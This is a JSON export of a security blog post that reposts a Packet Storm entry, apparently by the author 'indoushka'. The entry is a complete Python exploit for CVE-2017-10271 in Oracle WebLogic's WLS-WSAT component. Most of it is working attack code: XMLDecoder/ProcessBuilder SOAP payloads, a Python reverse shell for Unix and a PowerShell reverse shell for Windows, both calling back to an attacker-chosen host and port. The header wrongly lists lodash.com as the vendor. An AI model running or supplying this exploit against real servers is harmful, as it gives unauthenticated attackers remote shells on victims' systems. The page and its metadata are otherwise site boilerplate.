{"id":53078,"date":"2026-05-11T12:53:30","date_gmt":"2026-05-11T12:53:30","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=53078"},"modified":"2026-05-11T12:53:30","modified_gmt":"2026-05-11T12:53:30","slug":"oracle-weblogic-wls-wsat-xmldecoder-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=53078","title":{"rendered":"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741"},"content":{"rendered":"

{“lastseen”:”2026-05-11T17:17:28″,”description”:”This script is a Python-based proof of concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server’s WLS-WSAT component. The vulnerability allows unauthenticated attackers to execute arbitrary system commands via crafted SOAP…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:220741″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2017-10271″],”sourceData”:”==================================================================================================================================\\n | # Title : Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/lodash.com\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This script is a Python-based proof-of-concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server\u2019s WLS-WSAT component (CVE-2017-10271). \\n The vulnerability allows unauthenticated attackers to execute arbitrary system commands via crafted SOAP requests sent to the \/wls-wsat\/CoordinatorPortType endpoint.\\n The exploit supports both Unix and Windows targets by dynamically generating appropriate command payloads. \\n \\t\\t\\t\\t It provides two operational modes: a verification mode that triggers an outbound HTTP request to confirm vulnerability, \\n \\t\\t\\t\\t and an execution mode that attempts to establish a reverse shell connection to the attacker-controlled host.\\n The tool constructs malicious XML payloads leveraging Java\u2019s XMLDecoder and ProcessBuilder classes, enabling remote command execution if the target is vulnerable and accessible. \\n \\t\\t\\t\\t It is intended strictly for security testing and research purposes in controlled environments.\\n \\n [+] POC : \\n \\n \\n #!\/usr\/bin\/env python\\n # -*- coding: utf-8 -*-\\n \\n from sys import exit\\n from requests import post\\n from argparse import ArgumentParser\\n from random import choice\\n from string import ascii_uppercase, ascii_lowercase, digits\\n from xml.sax.saxutils import escape\\n \\n \\n class Exploit:\\n \\n def __init__(self, check, rhost, lhost, lport, windows):\\n self.url = rhost if not rhost.endswith(‘\/’) else rhost.strip(‘\/’)\\n self.lhost = lhost\\n self.lport = lport\\n self.check = check\\n \\n if windows:\\n self.target = ‘win’\\n else:\\n self.target = ‘unix’\\n \\n if self.target == ‘unix’:\\n self.cmd_payload = (\\n \\”python -c ‘import socket,subprocess,os;\\”\\n \\”s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\\”\\n \\”s.connect((\\\\\\”{lhost}\\\\\\”,{lport}));\\”\\n \\”os.dup2(s.fileno(),0);\\”\\n \\”os.dup2(s.fileno(),1);\\”\\n \\”os.dup2(s.fileno(),2);\\”\\n \\”subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”]);’\\”\\n ).format(lhost=self.lhost, lport=self.lport)\\n else:\\n self.cmd_payload = (\\n r\\”powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \\”\\n r\\”{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a=’\\” + self.lhost + r\\”‘;\\”\\n r\\”$p=’\\” + self.lport + r\\”‘;$c=New-Object system.net.sockets.tcpclient;\\”\\n r\\”$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\\”\\n r\\”$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName=’cmd.exe’;\\”\\n r\\”$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\\”\\n r\\”$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\\”\\n r\\”$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\\”\\n r\\”while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\\”\\n r\\”$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\\”\\n r\\”while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1;\\”\\n r\\”while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length – $pos);\\”\\n r\\”$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};\\”\\n r\\”if ($nb[0..$($pos-1)] -contains 10) {break}};\\”\\n r\\”if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);\\”\\n r\\”start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());\\”\\n r\\”while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=”}};\\”\\n r\\”$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\\”\\n )\\n \\n self.cmd_payload = escape(self.cmd_payload)\\n \\n def cmd_base(self):\\n return ‘cmd’ if self.target == ‘win’ else ‘\/bin\/sh’\\n \\n def cmd_opt(self):\\n return ‘\/c’ if self.target == ‘win’ else ‘-c’\\n \\n def get_generic_check_payload(self):\\n random_uri = ”.join(\\n choice(ascii_uppercase + ascii_lowercase + digits)\\n for _ in range(16))\\n \\n return ”’\\u003csoapenv:Envelope xmlns:soapenv=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\”\\u003e\\n \\u003csoapenv:Header\\u003e\\n \\u003cwork:WorkContext xmlns:work=\\”http:\/\/bea.com\/2004\/06\/soap\/workarea\/\\”\\u003e\\n \\u003cjava version=\\”1.8\\” class=\\”java.beans.XMLDecoder\\”\\u003e\\n \\u003cobject id=\\”url\\” class=\\”java.net.URL\\”\\u003e\\n \\u003cstring\\u003ehttp:\/\/{lhost}:{lport}\/{random_uri}\\u003c\/string\\u003e\\n \\u003c\/object\\u003e\\n \\u003cobject idref=\\”url\\”\\u003e\\n \\u003cvoid id=\\”stream\\” method=\\”openStream\\” \/\\u003e\\n \\u003c\/object\\u003e\\n \\u003c\/java\\u003e\\n \\u003c\/work:WorkContext\\u003e\\n \\u003c\/soapenv:Header\\u003e\\n \\u003csoapenv:Body\/\\u003e\\n \\u003c\/soapenv:Envelope\\u003e”’.format(\\n lhost=self.lhost,\\n lport=self.lport,\\n random_uri=random_uri\\n )\\n \\n def get_process_builder_payload(self):\\n return ”’\\u003csoapenv:Envelope xmlns:soapenv=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\”\\u003e\\n \\u003csoapenv:Header\\u003e\\n \\u003cwork:WorkContext xmlns:work=\\”http:\/\/bea.com\/2004\/06\/soap\/workarea\/\\”\\u003e\\n \\u003cjava\\u003e\\n \\u003cobject class=\\”java.lang.ProcessBuilder\\”\\u003e\\n \\u003carray class=\\”java.lang.String\\” length=\\”3\\”\\u003e\\n \\u003cvoid index=\\”0\\”\\u003e\\n \\u003cstring\\u003e{cmd_base}\\u003c\/string\\u003e\\n \\u003c\/void\\u003e\\n \\u003cvoid index=\\”1\\”\\u003e\\n \\u003cstring\\u003e{cmd_opt}\\u003c\/string\\u003e\\n \\u003c\/void\\u003e\\n \\u003cvoid index=\\”2\\”\\u003e\\n \\u003cstring\\u003e{cmd_payload}\\u003c\/string\\u003e\\n \\u003c\/void\\u003e\\n \\u003c\/array\\u003e\\n \\u003cvoid method=\\”start\\”\/\\u003e\\n \\u003c\/object\\u003e\\n \\u003c\/java\\u003e\\n \\u003c\/work:WorkContext\\u003e\\n \\u003c\/soapenv:Header\\u003e\\n \\u003csoapenv:Body\/\\u003e\\n \\u003c\/soapenv:Envelope\\u003e”’.format(\\n cmd_base=self.cmd_base(),\\n cmd_opt=self.cmd_opt(),\\n cmd_payload=self.cmd_payload\\n )\\n \\n def print_banner(self):\\n print(\\”=\\” * 80)\\n print(\\”CVE-2017-10271 RCE Exploit\\”)\\n print(\\”written by: indoushka\\”)\\n print(\\”Remote Target: {}\\”.format(self.url))\\n print(\\”Shell Listener: {}:{}\\”.format(self.lhost, self.lport))\\n print(\\”=\\” * 80)\\n \\n def post_exploit(self, data):\\n headers = {\\n \\”Content-Type\\”: \\”text\/xml;charset=UTF-8\\”,\\n \\”User-Agent\\”: \\”Mozilla\/5.0\\”\\n }\\n \\n vulnurl = self.url + \\”\/wls-wsat\/CoordinatorPortType\\”\\n \\n try:\\n req = post(vulnurl, data=data, headers=headers, timeout=10, verify=False)\\n \\n if self.check:\\n print(\\”[*] Did you get an HTTP GET request back?\\”)\\n else:\\n print(\\”[*] Did you get a shell back?\\”)\\n \\n except Exception as e:\\n print(‘[!] Connection Error’)\\n print(e)\\n \\n def run(self):\\n self.print_banner()\\n \\n if self.check:\\n print(‘[+] Generating generic check payload’)\\n payload = self.get_generic_check_payload()\\n else:\\n print(‘[+] Generating execution payload’)\\n payload = self.get_process_builder_payload()\\n \\n print(‘[*] Generated:’)\\n print(payload)\\n \\n if self.check:\\n print(‘[+] Running generic check payload’)\\n else:\\n \\n print(‘[+] Running {} execute payload’.format(self.target))\\n \\n self.post_exploit(data=payload)\\n \\n \\n if __name__ == \\”__main__\\”:\\n parser = ArgumentParser(description=’CVE-2017-10271 WebLogic exploit’)\\n \\n parser.add_argument(‘-l’, ‘–lhost’, required=True, dest=’lhost’)\\n parser.add_argument(‘-p’, ‘–lport’, required=True, dest=’lport’)\\n parser.add_argument(‘-r’, ‘–rhost’, required=True, dest=’rhost’)\\n parser.add_argument(‘-c’, ‘–check’, dest=’check’, action=’store_true’)\\n parser.add_argument(‘-w’, ‘–win’, dest=’windows’, action=’store_true’)\\n \\n args = parser.parse_args()\\n \\n exploit = Exploit(\\n check=args.check,\\n rhost=args.rhost,\\n lhost=args.lhost,\\n lport=args.lport,\\n windows=args.windows\\n )\\n \\n exploit.run()\\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220741″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220741\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-11T17:17:28″,”description”:”This script is a Python-based proof of concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server’s WLS-WSAT component. The vulnerability allows unauthenticated attackers to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-53078","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=53078\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-11T17:17:28″,”description”:”This script is a Python-based proof of concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server’s WLS-WSAT component. The vulnerability allows unauthenticated attackers to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=53078\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-11T12:53:30+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53078#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53078\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741\",\"datePublished\":\"2026-05-11T12:53:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53078\"},\"wordCount\":1472,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53078#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53078\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53078\",\"name\":\"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-11T12:53:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53078#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53078\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53078#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=53078","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741 - zero redgem","og_description":"{“lastseen”:”2026-05-11T17:17:28″,”description”:”This script is a Python-based proof of concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server’s WLS-WSAT component. The vulnerability allows unauthenticated attackers to...","og_url":"https:\/\/zero.redgem.net\/?p=53078","og_site_name":"zero redgem","article_published_time":"2026-05-11T12:53:30+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=53078#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=53078"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741","datePublished":"2026-05-11T12:53:30+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=53078"},"wordCount":1472,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=53078#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=53078","url":"https:\/\/zero.redgem.net\/?p=53078","name":"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-11T12:53:30+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=53078#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=53078"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=53078#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/53078","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=53078"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/53078\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=53078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=53078"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=53078"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}